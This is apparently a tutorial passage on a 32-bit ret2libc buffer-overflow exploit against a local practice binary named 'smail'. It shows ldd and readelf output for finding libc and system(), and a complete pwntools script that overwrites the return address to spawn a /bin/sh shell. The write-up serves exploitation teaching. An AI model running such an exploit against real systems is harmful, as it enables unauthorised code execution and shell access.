ret2libc - 32-bit Exploit
A ret2libc is based off the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.
Getting Libc and its base
We need libc.so.6, so the base address of libc is 0xf7dc2000
> ldd smail linux-gate.so.1 (0xf7fd2000) libc.so.6 => /lib32/libc.so.6 (0xf7dc2000) /lib/ld-linux.so.2 (0xf7fd3000)
Getting the location of system()
To call system, we obviously need its location in memory. We can use the readelf command for this.
The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00
> readelf -s /lib32/libc.so.6 | grep system 1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
Getting the location of /bin/sh
Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
from pwn import * p = process('./smail') libc_base = 0xf7dc2000 system = libc_base + 0x44f00 binsh = libc_base + 0x18c32b payload = b'A' * 76 # The padding payload += p32(system) # Location of system payload += p32(0x0) # return pointer - not important once we get the shell payload += p32(binsh) # pointer to command: /bin/sh p.clean() p.sendline(payload) p.interactive()